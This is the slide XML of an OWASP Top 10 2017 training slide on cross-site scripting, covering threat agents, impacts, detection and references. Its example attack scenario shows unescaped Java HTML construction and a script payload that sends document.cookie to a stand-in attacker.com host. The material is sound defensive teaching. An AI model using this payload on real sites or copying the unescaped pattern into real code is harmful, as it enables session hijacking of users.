                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>AVERAGE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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Prevalence</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>VERY WIDESPREAD</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FF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Detectability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>AVERAGE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Im</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>pact</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODERATE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Application / Business</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</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482104">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Consider</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> anyone who can send untrusted </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>data to the system,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> including external users, business partners, other systems, internal users, and administrators.</a:t>
                      </a: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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Attackers send text-based attack scripts that exploit the interpreter in the browser. Almost any source of data can be an attack vector, including internal sources such as data from the database.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="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marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>XSS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> flaws occur when an application updates a web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> page with </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>attacker controlled data without properly escaping</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>that content or using a safe JavaScript API. There are two primary categories</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> of XSS flaws: (1) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>Stored</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, and (2) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>Reflected</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, and each of these can occur on (a) the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>Server</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> or (b) on the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>Client</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. Detection of most </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>Server XSS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> flaws is fairly easy via testing or code analysis. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>Client XSS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> can be very difficult to identify.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="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a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Attackers can execute scripts in a victim’s browser to hijack user sessions, deface web sites, insert hostile content, redirect users</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>hijack the user’s browser using malware, etc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Consider the business value of the affected system and all the data it processes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Also consider the business impact of public exposure of the vulnerability.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="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07" name="Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="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Example Attack Scenario</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  (String) page += "&lt;input name='creditcard' type='TEXT'</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" + request.getParameter("CC") + "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The attacker modifies the ‘CC’ parameter in his browser to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&lt;script&gt;document.location=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.attacker.com/cgi-bin/cookie.cgi?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  foo=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+document.cookie&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This attack causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Note that attackers can also use XSS to defeat any  automated CSRF defense the application might employ. See 2017-A8 for info on CSRF.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="35814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Am I Vulnerable to XSS?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="300" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You are vulnerable to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Server XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if your server-side code uses user-supplied input as part of the HTML output, and you don’t use context-sensitive escaping to ensure it cannot run. If a web page uses JavaScript to dynamically add attacker-controllable data to a page, you may have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Client XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Ideally, you would avoid sending attacker-controllable data to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>unsafe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>JavaScript APIs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, but escaping (and to a lesser extent) input validation can be used to make this safe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Automated tools can find some XSS problems automatically. However, each application builds output pages differently and uses different browser side interpreters such as JavaScript, ActiveX, Flash, and Silverlight, usually using 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> party libraries built on top of these technologies. This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>diveristy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> makes automated detection difficult, particularly when using modern single-page applications and powerful JavaScript frameworks and libraries. Therefore, complete coverage requires a combination of manual code review and penetration testing, in addition to automated approaches.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="347472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References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>Types of Cross-Site Scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>OWASP XSS Prevention Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
